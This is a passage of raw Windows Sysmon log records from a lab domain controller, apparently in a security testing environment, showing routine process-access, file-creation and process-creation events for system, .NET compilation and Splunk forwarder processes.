13:50:36.243{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-0F04-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:36.243{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-0F04-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:36.165{59A5CD1D-922B-6005-0E04-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\edc-0\System.ComponentModel.Composition.dll2021-01-18 13:50:36.165 10341000x80000000000000008318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:37.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922D-6005-1604-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:37.430{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922D-6005-1604-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:37.430{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922D-6005-1604-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:37.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922D-6005-1504-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:37.040{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922D-6005-1504-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:37.040{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922D-6005-1504-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9234-6005-1704-00000000A301}4204C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9234-6005-1704-00000000A301}4204C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9234-6005-1704-00000000A301}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.759{59A5CD1D-9234-6005-1704-00000000A301}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.946{59A5CD1D-9235-6005-1904-00000000A301}48763472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:45.852{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9235-6005-1A04-00000000A301}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:45.836{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9235-6005-1A04-00000000A301}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:45.836{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9235-6005-1A04-00000000A301}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64